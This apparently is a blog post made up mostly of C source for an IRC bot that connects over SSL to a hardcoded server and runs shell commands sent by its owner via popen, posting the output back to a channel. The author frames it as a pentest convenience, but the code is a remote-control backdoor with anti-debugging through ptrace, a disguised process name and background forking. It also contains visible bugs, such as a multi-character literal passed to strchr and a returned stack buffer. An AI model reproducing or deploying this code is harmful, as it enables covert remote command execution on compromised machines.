/*
* An SSL IRC bot that will run some commands on teh hoster, useful for running
* john on your linux box via irc during a pentest - cheap man's VPN ;)
*
* Has a couple of little bugs which I might fix, but it serves it's simple purpose.
*
* You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
* just added that as a test to see if it would tell if a MITM was present.
*
*/
#include < stdio.h > // You will have to fix these spaces, blogspot's fault.
#include < string.h >
#include < unistd.h >
#include < arpa/inet.h >
#include < sys/ptrace.h >
#include < sys/socket.h >
#include < sys/types.h >
#include < resolv.h >
#include < netdb.h >
#include < openssl/ssl.h >
#include < openssl/err.h >
#define OWNER "x0ng@i.r.steppin.down"
#define NICK "ruxxbot"
#define USER "ruxxbot"
#define CHAN "home"
#define SERV "nodefense.org"
#define PASS "" //channel password
#define PORT 65531
#define LABEL "t3hrUxx0r"
#define SSLTYPE1 "AES256-SHA"
#define SSLTYPE2 "TLSv1i/SSLv3"
#define BSIZE 80
SSL_CTX*
initctx(void)
{
SSL_METHOD *method;
SSL_CTX *ctx;
SSL_library_init();
OpenSSL_add_all_algorithms();
method = SSLv23_client_method();
ctx = SSL_CTX_new(method);
return ctx;
}
void
srvsend(SSL *ssl, char *msg)
{
if(SSL_write(ssl, msg, strlen(msg)) < 1)
exit(1);
}
char *
srvread(SSL *ssl)
{
int bytes;
char buf[4096] = {0};
char * msgbuf = (char *)malloc(BSIZE);
char * ret = NULL;
bytes = SSL_read(ssl, buf, sizeof(buf)-1);
if(!bytes)
exit(1);
if((strlen(buf) > 2047) || strlen(buf) < 1)
exit(1);
buf[2047] = '\0';
if(strstr(buf, "PING")) {
sleep(2);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(SERV) + 8, "PONG :%s\r\n", SERV);
srvsend(ssl, msgbuf);
}
free(msgbuf);
msgbuf = NULL;
ret = buf;
return ret;
}
void
runcmd(SSL *ssl, char * cmdptr)
{
char buf[256] = {0};
char * cmdbuf = (char *)malloc(2048);
char * lol = NULL;
FILE * sys = NULL;
memset(cmdbuf, 0, 2048);
if((strlen(cmdptr) > 256) || (strlen(cmdptr) < 1))
return;
lol = strchr(cmdptr, '!e ');
if(!lol)
return;
lol[strlen(lol)-2] = '\0';
sys = popen(lol, "r");
if(!sys)
return;
while(fgets(buf, sizeof(buf)-1, sys)) {
snprintf(cmdbuf, strlen(buf) + strlen(OWNER) + 11, "PRIVMSG #%s %s\n", CHAN, buf);
srvsend(ssl, cmdbuf);
}
free(cmdbuf);
cmdbuf = NULL;
pclose(sys);
}
void
op(SSL *ssl)
{
char * opbuf = (char *)malloc(BSIZE);
snprintf(opbuf, strlen(CHAN) + 15, "MODE #%s +o x0ng\n", CHAN);
srvsend(ssl, opbuf);
free(opbuf);
opbuf = NULL;
}
void
srvconn(SSL *ssl)
{
char * cmd = NULL;
char * cmdptr = NULL;
char * msgbuf = (char *)malloc(BSIZE);
struct set
{
char * chan;
char * pass;
char * user;
char * nick;
} irc;
irc.chan = CHAN;
irc.user = USER;
irc.nick = NICK;
irc.pass = PASS;
if(strlen(irc.chan) > 15 && strlen(irc.pass) > 15 && strlen(irc.user) > 15 && strlen(irc.nick) > 15)
exit(1);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.nick)+7, "NICK %s\r\n", irc.nick);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + 11, "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.chan) + strlen(irc.pass) + 9, "JOIN #%s %s\r\n", irc.chan, irc.pass);
srvsend(ssl, msgbuf);
for(;;) {
cmd = srvread(ssl);
//printf("\n%s\n", cmd); // Debug
if((cmdptr = strstr(cmd, OWNER))) {
if((cmdptr = strstr(cmd,"!op"))) {
op(ssl);
}
if((cmdptr = strstr(cmd,"!e"))) {
runcmd(ssl, cmdptr);
}
}
}
free(msgbuf);
msgbuf = NULL;
}
int
srvssl(SSL *ssl)
{
if((!strstr(SSL_get_cipher_name(ssl), "AES256-SHA")) || (!strstr(SSL_get_cipher_version(ssl), "TLSv1i/SSLv3")))
return -1;
return 1;
}
int
main(int argc, char * argv[])
{
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1)
exit(1);
int conx, sock, port = PORT;
struct sockaddr_in sout;
struct hostent *he;
SSL_CTX *ctx;
SSL *ssl;
pid_t pid;
strcpy(argv[0], LABEL);
he = gethostbyname(SERV);
bzero((char *)&sout, sizeof(sout));
sout.sin_family = AF_INET;
sout.sin_port = htons(port);
memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);
sock = socket(AF_INET, SOCK_STREAM, 0);
ctx = initctx();
ssl = SSL_new(ctx);
pid = fork();
if(pid == 0) {
conx = connect(sock, (struct sockaddr *)&sout, sizeof(sout));
SSL_set_fd(ssl, sock);
SSL_connect(ssl);
if(srvssl(ssl))
srvconn(ssl);
}
close(sock);
SSL_free(ssl);
SSL_CTX_free(ctx);
return 0;
}
Labels: Security